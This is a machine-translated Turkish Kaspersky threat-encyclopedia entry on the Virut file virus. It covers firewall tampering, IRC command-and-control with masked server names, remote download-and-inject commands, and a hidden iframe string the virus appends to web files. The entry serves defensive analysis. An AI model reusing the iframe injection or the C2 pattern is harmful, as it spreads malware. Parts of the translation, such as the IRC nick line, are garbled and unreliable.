BU SERVİS, GOOGLE TARAFINDAN SAĞLANAN ÇEVİRİLER İÇEREBİLİR. GOOGLE, HERHANGİ BİR GARANTİ, GÜVENİLİRLİK VE TİCARİ ELVERİŞLİLİK, BELİRLİ BİR AMACA UYGUNLUK VE İHLAL ETMEME GARANTİLERİ DAHİL OLMAK ÜZERE AÇIK VEYA ZIMNİ GARANTİLER DE DAHİL OLMAK ÜZERE, AÇIK VEYA ZIMNİ TÜM GARANTİLERİ REDDEDER.

Kaspersky Lab web sitesi, Google Çeviri tarafından desteklenen çeviri yazılımı kullanılarak size kolaylık sağlamak amacıyla tercüme edilmiştir. Doğru bir çeviri sağlamak için makul çabalar sarf edilmiştir, ancak otomatik çeviri mükemmel değildir ve insan çevirmenlerinin yerini alması amaçlanmamıştır. Çeviriler, Kaspersky Lab web sitesinin kullanıcılarına bir hizmet olarak sunulur ve "olduğu gibi" sağlanır. İngilizce'den başka bir dile çevrilmiş herhangi bir çevirinin doğruluğu, güvenilirliği veya doğruluğu konusunda açık ya da zımni hiçbir garanti verilmemektedir. Çeviri yazılımı sınırlamaları nedeniyle bazı içerikler (görüntüler, videolar, Flash vb. Gibi) doğru bir şekilde çevrilemeyebilir.

Virus.Win32.Virut

Bulunma tarihi 10/23/2007
Sınıf Virus
Platform Win32
Açıklama

Virüs, ana bilgisayar işleminin yürütülebilir dosyasını güvenilen uygulamaların Windows güvenlik duvarı listesine ekler.

Ardından “Sistem dosyalarını geri yükle” işlevini devre dışı bırakır.

Virüs, aşağıdaki IRC sunucularıyla iletişim kurmaya çalışır:




prox ***** ircgalaxy.pl



irc ***** ef.pl



Bir bağlantı kurulduğunda, virüs aşağıdaki komutları sunucuya gönderir:




NICK Instagram Hesabındaki Resim ve Videoları dewxxpyi



KULLANICI b



JOIN #. <Rnd1>, burada rnd1 rastgele bir sayıdır.



Ardından virüs bekleme moduna girer, zararlı IRC sunucusundan komutları almaya ve yürütmeye hazırdır.

Virüs aşağıdaki komutları çalıştırabilir:

  • Alın: İnternetten kötü niyetli bir kod indirin ve kurbanın bilgisayarında çalışan işlemlere enjekte edin.
  • hosu: kurbanın bilgisayarında belirtilen URL'leri aç.

Virüs ayrıca aşağıdaki uzantılara sahip dosyalar için kurbanın bilgisayarının sabit diskini tarar:




HTM



PHP



ASP



Bulunursa, aşağıdaki dizeyi onlara ekler:

<iframe src = "http: //****.pl/rc/" genişlik = 1 yükseklik = 1
style = "border: 0"> </ iframe>

Orijinaline link